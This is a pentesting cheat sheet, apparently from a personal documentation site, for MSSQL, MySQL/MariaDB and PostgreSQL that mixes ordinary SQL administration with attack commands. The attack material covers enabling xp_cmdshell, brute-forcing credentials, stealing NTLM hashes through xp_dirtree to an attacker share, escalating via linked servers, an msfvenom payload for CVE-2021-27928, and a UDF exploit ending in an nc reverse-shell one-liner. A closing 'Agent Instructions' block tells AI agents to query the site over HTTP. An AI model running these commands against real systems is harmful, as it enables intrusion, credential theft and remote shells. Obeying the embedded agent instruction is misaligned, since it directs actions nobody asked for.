# MSSQL / MYSQL / PSQL

## 01. MSSQL \[1433]

### 01.0 Basics 

```bash
## ------------------| Connection
#### Linux
impacket-mssqlclient $IP -k                                       ## Use Kerberos authentication (requires KRB5CCNAME set)
impacket-mssqlclient <UserName>:'<Password>'@$IP 
impacket-mssqlclient <Domain>/<UserName>:'<Password>'@$IP
impacket-mssqlclient <UserName>:'<Password>'@$IP -windows-auth 
impacket-mssqlclient <user>@$IP -hashes <LMHASH>:<NTHASH>         ## Authenticate using NTLM hashes
#### Windows
sqlcmd -U <UserName> -P '<Password>' -Q "sp_databases"
sqlcmd -U <UserName> -P '<Password>' -Q 'USE <DATABASE>; select * from users;'

## ------------------| Execute commands with impacket-mssqlclient
enable_xp_cmdshell
xp_cmdshell whoami

## ------------------| Show Database
SELECT name FROM master.dbo.sysdatabases;
SELECT name FROM sys.databases;
select name from sysdatabases;
EXEC sp_databases;

## ------------------| Use Database
USE <DB_NAME>;

## ------------------| Create Database
CREATE DATABASE <DB_NAME>;

## ------------------| List Tables
select table_name,table_schema from <DB_NAME>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM <DBNAME>..sysobjects WHERE xtype = 'U';

## ------------------| List Column Names 
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'table_name');     
SELECT table_name, column_name FROM information_schema.columns;
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '<TABLE_NAME>' ORDER BY ORDINAL_POSITION
EXEC sp_columns '<TABLE_NAME>'

## ------------------| Create Login/User & Grant Privileges
CREATE LOGIN <USER> WITH PASSWORD = '<PASSWORD>';
USE <DB_NAME>;
CREATE USER <USER> FOR LOGIN <USER>;
ALTER ROLE db_owner ADD MEMBER <USER>;

## ------------------| Create Table
CREATE TABLE employees (
    id INT IDENTITY(1,1) PRIMARY KEY,
    name VARCHAR(100),
    age INT,
    department VARCHAR(50),
    salary DECIMAL(10,2)
);

## ------------------| Inserting Data
INSERT INTO employees (name, age, department, salary) VALUES ('h4rithd', 30, 'IT', 5000.00);
INSERT INTO employees (name, age, department, salary) VALUES 
('Alice', 28, 'HR', 4500.00),
('Bob', 35, 'Finance', 6000.00);

## ------------------| Updating Data
UPDATE <TABLE_NAME> SET column1 = newvalue1, column2 = newvalue2 WHERE <condition>;
UPDATE employees SET salary = 7000.00 WHERE name = 'h4rithd';

## ------------------| Deleting Data
DELETE FROM employees WHERE id = 3;
DELETE FROM employees;
TRUNCATE TABLE employees;

## ------------------| Drop Table or Database
DROP TABLE <TABLE_NAME>;
DROP DATABASE <DB_NAME>;

## ------------------| Alter Table
ALTER TABLE <TABLE_NAME> ADD <COLUMN_NAME> <DATA_TYPE>;
EXEC sp_rename '<TABLE_NAME>.old_name', 'new_name', 'COLUMN';
ALTER TABLE <TABLE_NAME> ALTER COLUMN <COLUMN_NAME> <NEW_DATA_TYPE>;
ALTER TABLE <TABLE_NAME> DROP COLUMN <COLUMN_NAME>;

## ------------------| Selecting & Filtering Data
SELECT * FROM <TABLE_NAME>;
SELECT * FROM <TABLE_NAME> WHERE <condition>;
SELECT name, salary FROM employees WHERE department = 'IT';

## ------------------| Sorting Results
SELECT * FROM <TABLE_NAME> ORDER BY <COLUMN> ASC;
SELECT * FROM <TABLE_NAME> ORDER BY <COLUMN1> DESC, <COLUMN2> ASC;

## ------------------| Limiting Results
SELECT * FROM <TABLE_NAME> ORDER BY <COLUMN> OFFSET <OFFSET> ROWS FETCH NEXT <COUNT> ROWS ONLY;

## ------------------| Pattern Matching
SELECT * FROM <TABLE_NAME> WHERE <COLUMN> LIKE '%value%';
SELECT * FROM <TABLE_NAME> WHERE <COLUMN> LIKE 'value%';
SELECT * FROM <TABLE_NAME> WHERE <COLUMN> LIKE '%value';

## ------------------| Table Column Properties
PRIMARY KEY (<COLUMN>);
<COLUMN> INT NOT NULL IDENTITY(1,1);
<COLUMN> <DATA_TYPE> UNIQUE NOT NULL;
<COLUMN> <DATA_TYPE> DEFAULT GETDATE();
<COLUMN> <DATA_TYPE> NOT NULL;

## ------------------| Useful Column Enumeration
SELECT table_name, column_name 
FROM information_schema.columns
WHERE column_name LIKE '%pass%' 
   OR column_name LIKE '%user%' 
   OR column_name LIKE '%username%' 
   OR column_name LIKE '%password%';
   
## ------------------| Export data
EXEC xp_cmdshell 'bcp "SELECT * FROM sysfiles" queryout "C:\dump-data.txt" -T -c -t,'

## ------------------| Search text in stored procedure in SQL Server
SELECT name FROM sys.procedures WHERE Object_definition(object_id) LIKE '%flag%';

## ------------------| Other
select name,sysadmin from syslogins;
SELECT schema_name FROM information_schema.schemata;

## ------------------| Check links 
select srvname, isremote from sysservers; <-- value 1 is remote 0 is linked
exec ('select current_user') at [linkd_name];
exec ('select name,sysadmin from syslogins') at [linkd_name];
exec ('EXEC (''EXEC sp_addlogin ''''h4rithd'''', ''''harith!1'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];  
exec ('EXEC (''EXEC sp_addsrvrolemember ''''h4rithd'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\EXEC POO_CONFIG];  

## ------------------| Miscellaneous
SELECT COUNT(*) FROM <TABLE_NAME>;
SELECT DISTINCT <COLUMN> FROM <TABLE_NAME>;
EXEC sp_rename 'old_table', 'new_table';
SELECT * INTO backup_employees FROM employees;

## ------------------| Check IMPERSONATE permissions
SELECT pr.name AS Grantee, pr2.name AS Grantor, pe.permission_name, pe.state_desc FROM sys.server_permissions pe JOIN sys.server_principals pr ON pe.grantee_principal_id = pr.principal_id JOIN sys.server_principals pr2 ON pe.grantor_principal_id = pr2.principal_id WHERE pe.type = 'IM';

## ------------------| IMPERSONATE as other user 
EXECUTE AS LOGIN = '<USERNAME>'; SELECT SUSER_NAME() AS CurrentUser; REVERT;
```

### 01.1 Enumaration

```bash
## ------------------| Bruteforce 
nxc mssql $IP -u users.txt -p pass.txt
nxc mssql $IP -u users.txt -p pass.txt --local-auth

## ------------------| Nmap Scripts
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>       
### -- ms-sql-info: Grabs basic MSSQL information.
### -- ms-sql-empty-password: Tests for blank password access.
### -- ms-sql-xp-cmdshell: Checks for command execution via xp_cmdshell.
### -- ms-sql-dump-hashes: Dumps password hashes.
### -- ms-sql-ntlm-info: Gathers NTLM information.
### -- ms-sql-tables: Lists tables in accessible databases.
### -- ms-sql-hasdbaccess: Checks user access to databases.

## ------------------| Metasploit Modules
use auxiliary/admin/mssql/mssql_ntlm_stealer           ## Steal NTLM hash, before executing run Responder  
use auxiliary/admin/mssql/mssql_enum                   ## Enumerate MSSQL server configuration and version info  
use auxiliary/admin/mssql/mssql_enum_domain_accounts   ## Enumerate domain accounts via MSSQL  
use auxiliary/admin/mssql/mssql_enum_sql_logins        ## Enumerate SQL login users  
use auxiliary/admin/mssql/mssql_findandsampledata      ## Find and dump sample/interesting data  
use auxiliary/scanner/mssql/mssql_hashdump             ## Dump password hashes from MSSQL server  
use auxiliary/scanner/mssql/mssql_schemadump           ## Dump full database schema (tables, columns, etc.)  
use auxiliary/admin/mssql/mssql_idf                    ## Identify and extract sensitive fields (emails, phones, etc.)  
use exploit/windows/mssql/mssql_linkcrawler            ## Uses linked servers to pivot/escalate access  
use auxiliary/admin/mssql/mssql_escalate_execute_as    ## Try privilege escalation using EXECUTE AS (IMPERSONATE permission required)  
use auxiliary/admin/mssql/mssql_escalate_dbowner       ## Escalate from db_owner role to sysadmin  
use auxiliary/admin/mssql/mssql_exec                   ## Execute system commands via xp_cmdshell  
use exploit/windows/mssql/mssql_payload                ## Upload and execute a custom payload on the target  
use windows/manage/mssql_local_auth_bypass             ## Add new local admin user via Meterpreter session (bypasses auth)

## ------------------| NetExec MSSQL Commands
nxc mssql $IP -u <user> -p <pass>                ## Test credentials for MSSQL access
nxc mssql $IP -u <user> -p <pass> -k             ## Use Kerberos authentication
nxc mssql $IP -u <user> -H <NTLM_hash>           ## Authenticate using NTLM hash
nxc mssql $IP -u <user_list> -p <pass_list>      ## Password spraying to find valid credentials
nxc mssql $IP -u <user> -p <pass> --rid-brute    ## Rid Bruteforce
nxc mssql $IP -u <user> -p <pass> --local-auth   ## Use local authentication instead of domain
nxc mssql $IP -u <user> -p <pass> -M mssql_priv  ## Check for privilege escalation (impersonation to sa)
nxc mssql $IP -u <user> -p <pass> -x "whoami"    ## Execute system command via xp_cmdshell
nxc mssql $IP -u <user> -p <pass> -X "whoami" --no-output  ## Execute PowerShell command without output
nxc mssql $IP -u <user> -p <pass> -q "SELECT name FROM master.dbo.sysdatabases;"  ## Execute SQL query to list databases
nxc mssql $IP -u <user> -p <pass> --put-file <local_file> <remote_file>  ## Upload file to target
nxc mssql $IP -u <user> -p <pass> --get-file <remote_file> <local_file>  ## Download file from target

## ------------------| Impacket MSSQL Tools
impacket-mssqlclient $IP -k                                       ## Use Kerberos authentication (requires KRB5CCNAME set)
impacket-mssqlclient <user>:<pass>@$IP -q "SELECT @@version;"     ## Execute SQL query to get server version
impacket-mssqlclient <user>:<pass>@$IP -q "EXEC xp_cmdshell 'whoami';"  ## Execute system command via xp_cmdshell
impacket-mssqlclient <user>:<pass>@$IP -q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"  ## Enable xp_cmdshell
impacket-mssqlclient <user>:<pass>@$IP -q "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"  ## Check for impersonation privileges
impacket-mssqlclient <user>:<pass>@$IP -q "EXECUTE AS login = 'sa'; SELECT IS_SRVROLEMEMBER('sysadmin');"  ## Attempt impersonation to sa
impacket-mssqlclient <user>:<pass>@$IP -q "EXEC sp_linkedservers;"  ## List linked servers for potential pivoting

## ------------------| MSSqlPwner 
mssqlpwner $IP enumerate -u <user> -p <pass>          ## Enumerate MSSQL server details
mssqlpwner $IP exec -u <user> -p <pass> -cmd "whoami" ## Execute command via xp_cmdshell or other methods
mssqlpwner $IP ntlm-relay -u <user> -p <pass> -t $IP  ## Perform NTLM relay attack (e.g., with xp_dirtree)
mssqlpwner $IP brute -u <user_list> -p <pass_list>    ## Brute force credentials
mssqlpwner $IP -u <user> -hashes <LMHASH>:<NTHASH>    ## Authenticate using NTLM hashes
mssqlpwner $IP -k                                     ## Use Kerberos authentication
mssqlpwner $IP get-link-server-list -u <user> -p <pass>  ## Enumerate linked servers
mssqlpwner $IP interactive -u <user> -p <pass>        ## Interactive mode for manual queries and commands
mssqlpwner $IP direct-query -u <user> -p <pass> -q "SELECT @@version;"  ## Execute custom SQL query
```

### 01.2 Exploit

```bash
## ------------------| Execute commands with CrackMapExec
nxc mssql $IP -u <UserName> -p <Password> -x "whoami"  # CMD command
nxc mssql $IP -u <UserName> -H <HASH> -X 'whoami'      # PowerShell

## ------------------| Enable Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
EXEC sp_configure reconfigure;

## ------------------| Command Execution
EXEC xp_cmdshell 'cmd';
EXEC master.dbo.xp_cmdshell 'cmd';

## ------------------| Enable Alternative Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'OLE Automation Procedures', 1;
EXEC sp_configure reconfigure;

## ------------------| Alternative Command Execution
DECLARE @execmd INT;
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';

## ------------------| RunAs
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
EXECUTE AS USER = 'FooUser'; 

## ------------------| Read file (MSSQL)
BULK INSERT dbo.temp FROM 'c:flag.txt' WITH ( ROWTERMINATOR='n' );
DECLARE @h varchar(200);SET @h='\\10.10.14.38\h4rithd'; EXEC master.dbo.xp_dirtree @h;

## ------------------| Steel NTLM Hash
sudo responder -I tun0
EXEC xp_dirtree '\\10.10.14.38\h4rithd'
DECLARE @h varchar(200);SET @h='\\10.10.14.38\h4rithd'; EXEC master.dbo.xp_dirtree @h;  
## Crack
hashcat -m 5600 hash.txt wordlist.txt
john hash.txt -w=wordlist.txt

## ------------------| Enable external scripts
EXECUTE sp_configure 'external scripts enabled', 1;
RECONFIGURE
EXEC sp_execute_external_script @language = N'Python', @script = N'print("Hello harith");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("whoami");';
```

### 01.3 Other

* MDF File locations

```bash
## ------------------| MDF File locations
## SQL Server 2019 --> MSSQL15.XXXXXX
## SQL Server 2017 --> MSSQL14.XXXXXX
## SQL Server 2016 --> MSSQL13.XXXXXX
## SQL Server 2014 --> MSSQL12.XXXXXX
## For example : SQL Server 2019
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\mastlog.ldf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\tempdb.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\MSDBData.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf

## ------------------| MDF Extracting
git clone https://github.com/xpn/Powershell-PostExploitation.git
cd Powershell-PostExploitation/Invoke-MDFHashes
## Edit following lines on Get-MDFHashes.ps1 file
[System.Reflection.Assembly]::UnsafeLoadFrom($PSScriptRoot + "\OrcaMDF.RawCore.dll") | Out-Null
[System.Reflection.Assembly]::UnsafeLoadFrom($PSScriptRoot + "\OrcaMDF.Framework.dll") | Out-NUll   
pwsh
. .\Get-MDFHashes.ps1
Get-MDFHashes -mdf master.mdf    
```

## 02. MYSQL \[3306]

### 02.1 Basics

```bash
## ------------------| Initialization & Setup For Remote User
sudo apt update 
sudo DEBIAN_FRONTEND=noninteractive apt install -y mariadb-server
sudo systemctl start mysql
sudo systemctl enable mysql
systemctl status mysql
sudo mysql -u root -p
CREATE USER 'h4rithd'@'%' IDENTIFIED BY 'Password123'; GRANT ALL PRIVILEGES ON *.* TO 'h4rithd'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;
sudo sed -i 's/^bind-address.*/bind-address = 0.0.0.0/' /etc/mysql/mariadb.conf.d/50-server.cnf
sudo systemctl restart mysql
sudo grep bind-address -R /etc/mysql

## ------------------| Remote Connect 
mysql -h $IP -u <USER> -P <PORT> -p
mysql -h $IP -u <USER> -P <PORT> -p --skip-ssl
mysql -h $IP -u <USER> -P <PORT> -p --skip-ssl-verify-server-cert

## ------------------| Config files
/etc/mysql/mariadb.conf.d/50-server.cnf

## ------------------| Backup
mysqldump -u <USER> -p drupal > drupal_backup.sql

## ------------------| Import
mysql -u <USER> -p drupal < drupal_backup.sql

## ------------------| Common Commands
SHOW DATABASES;                            ### List databases
USE dbname;                                ### Change active database
USE mysql;                                 ### Change to the “system” database
SHOW TABLES;                               ### Show tables in active database
DESCRIBE tablename;                        ### Show table properties
SELECT host,db,user FROM mysql.db;         ### List databases
SELECT user,host,password FROM mysql.user; ### List all users

## ------------------| Reset password
sudo service mysql stop
sudo mkdir /var/run/mysqld
sudo chown mysql: /var/run/mysqld
sudo mysqld_safe --skip-grant-tables --skip-networking &
mysql -u root
FLUSH PRIVILEGES;
UPDATE mysql.user SET authentication_string=PASSWORD('toor'), plugin='mysql_native_password' WHERE User='root' AND Host='localhost';
# ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
FLUSH PRIVILEGES;
SELECT user,authentication_string,plugin,host FROM mysql.user;
EXIT;
sudo mysqladmin -S /var/run/mysqld/mysqld.sock shutdown
sudo service mysql start

## ------------------| Create Database
CREATE DATABASE <DB_NAME>;
​
## ------------------| Create User & Grant Privileges
CREATE USER '<USER>'@'<IP>' IDENTIFIED BY '<PASSWORD>';
GRANT ALL PRIVILEGES ON <DB_NAME>.* TO '<USER>'@'<IP>';
FLUSH PRIVILEGES;
​
## ------------------| Show & Use Database
SHOW DATABASES;
USE <DB_NAME>;
SHOW TABLES;
DESCRIBE <TABLE_NAME>;
​
## ------------------| Create Table
CREATE TABLE employees (
    id INT PRIMARY KEY AUTO_INCREMENT,
    name VARCHAR(100),
    age INT,
    department VARCHAR(50),
    salary DECIMAL(10,2)
);
​
## ------------------| Inserting Data
INSERT INTO employees (name, age, department, salary) VALUES ('h4rithd', 30, 'IT', 5000.00);
INSERT INTO employees (name, age, department, salary) VALUES ('Alice', 28, 'HR', 4500.00),('Bob', 35, 'Finance', 6000.00);
​
## ------------------| Updating Data
UPDATE <TABLE_NAME> SET column1 = newvalue1, column2 = newvalue2 WHERE <condition>;
UPDATE employees SET salary = 7000.00 WHERE name = 'h4rithd';
​
## ------------------| Deleting Data
DELETE FROM employees;               -- Delete specific record with id = 3
TRUNCATE TABLE employees;            -- Reset auto-increment ID (MySQL only)
DELETE FROM employees WHERE id = 3;  -- Delete all records
​
## ------------------| Selecting & Filtering Data
SELECT * FROM <TABLE_NAME>;
SELECT * FROM <TABLE_NAME> WHERE <condition>;
SELECT name, salary FROM employees WHERE department = 'IT';
​
## ------------------| Sorting Results
SELECT * FROM <TABLE_NAME> ORDER BY <COLUMN> ASC;
SELECT * FROM <TABLE_NAME> ORDER BY <COLUMN1> DESC, <COLUMN2> ASC;
​
## ------------------| Limiting Results
SELECT * FROM <TABLE_NAME> LIMIT <OFFSET>, <COUNT>;
​
## ------------------| Pattern Matching (Regex-like)
SELECT * FROM <TABLE_NAME> WHERE <COLUMN> LIKE '%value%';  -- contains
SELECT * FROM <TABLE_NAME> WHERE <COLUMN> LIKE 'value%';   -- starts with
SELECT * FROM <TABLE_NAME> WHERE <COLUMN> LIKE '%value';   -- ends with
​
## ------------------| Drop Table or Database
DROP TABLE <TABLE_NAME>;
DROP DATABASE <DB_NAME>;
​
## ------------------| Alter Table
ALTER TABLE <TABLE_NAME> ADD <COLUMN_NAME> <DATA_TYPE>;        -- Add new column
ALTER TABLE <TABLE_NAME> RENAME COLUMN old_name TO new_name;   -- Rename column (MySQL 8+)
ALTER TABLE <TABLE_NAME> MODIFY <COLUMN_NAME> <NEW_DATA_TYPE>; -- Modify data type
ALTER TABLE <TABLE_NAME> DROP COLUMN <COLUMN_NAME>;            -- Drop column
​
## ------------------| Table Column Properties
PRIMARY KEY (<COLUMN>);                  -- Uniquely identify propertie
<COLUMN> INT NOT NULL AUTO_INCREMENT;    -- Automatically Increments 
<COLUMN> <DATA_TYPE> UNIQUE NOT NULL;    -- Unique value, cannot be NULL
<COLUMN> <DATA_TYPE> DEFAULT NOW();      -- Default value is current timestamp
<COLUMN> <DATA_TYPE> NOT NULL;           -- Cannot be NULL
​
## ------------------| Useful Column Enumeration (OSINT/Pentest)
SELECT table_name, column_name FROM information_schema.columns 
WHERE column_name LIKE '%pass%' 
   OR column_name LIKE '%user%' 
   OR column_name LIKE '%username%' 
   OR column_name LIKE '%password%';
​
## ------------------| Miscellaneous
SELECT COUNT(*) FROM <TABLE_NAME>;            -- Count rows
SELECT DISTINCT <COLUMN> FROM <TABLE_NAME>;   -- Distinct values
RENAME TABLE old_table TO new_table;          -- Rename table
CREATE TABLE backup_employees AS SELECT * FROM employees;    -- Backup table (structure + data)  
```

### 02.2 Common Exploits

* MariaDB 10.2 ([CVE-2021-27928](https://www.cvedetails.com/cve/CVE-2021-27928/))

```bash
## ------------------| Check version
SELECT VERSION();

## ------------------| Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o exploit.so             
###  Copy the payload to the target machine

## ------------------| Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/exploit.so";'
```

### 02.3 User-Defined Function

* 5.5.5-10.3.20-MariaDB

```bash
## ------------------| Enum
show variables like '%plugin%';
show variables like '%secure_file_priv%'; ## this should return null or empty

## ------------------| Setup
git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys
sudo apt install -y default-libmysqlclient-dev
wget https://deb.sipwise.com/debian/pool/main/m/mariadb-10.3/libmariadb-dev_10.3.23-0+deb10u1_amd64.deb
sudo dpkg -i ./libmariadb-dev_10.3.23-0+deb10u1_amd64.de
rm lib_mysqludf_sys.so
gcc -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/ -I/usr/include/mariadb/server/private -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so    
xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex

## ------------------| Execute
set @shell = 0x<SHLLCODE>
select @@plugin_dir;
select binary @shell into dumpfile '<plugin_dir>/udf_sys_exec.so';
drop function sys_exec;
create function sys_exec returns int soname 'udf_sys_exec.so';
select * from mysql.func where name='sys_exec';
select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> 443 >/tmp/f');
```

* MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

```sql
## ------------------| Enum
show variables like '%plugin%';
show variables like '%secure_file_priv%'; ## this should return null or empty

## ------------------| Setup
wget https://www.exploit-db.com/raw/1518 -O raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc 

## ------------------| Execute
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
select * from foo into dumpfile '<plugin_dir_path>/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('ping -c 2 <IP>');
```

## 03. PostgreSQL \[5432]

```bash
## ------------------| Connect to database
psql -h localhost -d <DB_NAME> -U <USER_NAME>
### Using php
<?php
$conn = pg_connect("host=127.0.0.1 dbname=<DBName> user=<UserName> password=<PassWord>");
$result = pg_query($conn, "SELECT * FROM <DBName>");
$output = pg_fetch_all($result); print_r($output);
?>

## ------------------| Common Commands
\c                    ### Show Current Database
\du                   ### Show Current User
\l                    ### List All Databases
\c <database_name>    ### Switch to a Specific Database
\dt                   ### List All Tables
\d <table_name>       ### Describe a Specific Table
\d+ <table_name>      ### List All Columns in a Table
\dp                   ### List All Access Privilege
\dp <table_name>      ### List Access Privileges for a Specific Table
\di                   ### List All Indexes
\dn                   ### List All Schemas

select * from <TABLE_NAME>
```

* Install and Config&#x20;

```bash
## ------------------| Mac
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
brew install postgresql
brew services start postgresql

## ------------------| Create User and Password
psql postgres
CREATE USER h4rithd WITH PASSWORD 'StrongPassword123!';
CREATE DATABASE h4rithd_db OWNER h4rithd;
GRANT ALL PRIVILEGES ON DATABASE h4rithd_db TO h4rithd;
\q
#### To change the password later
ALTER USER h4rithd WITH PASSWORD 'NewStrongPassword123!';

## ------------------| Connect
psql -h localhost -U h4rithd -d h4rithd_db
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/database/mssql-mysql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.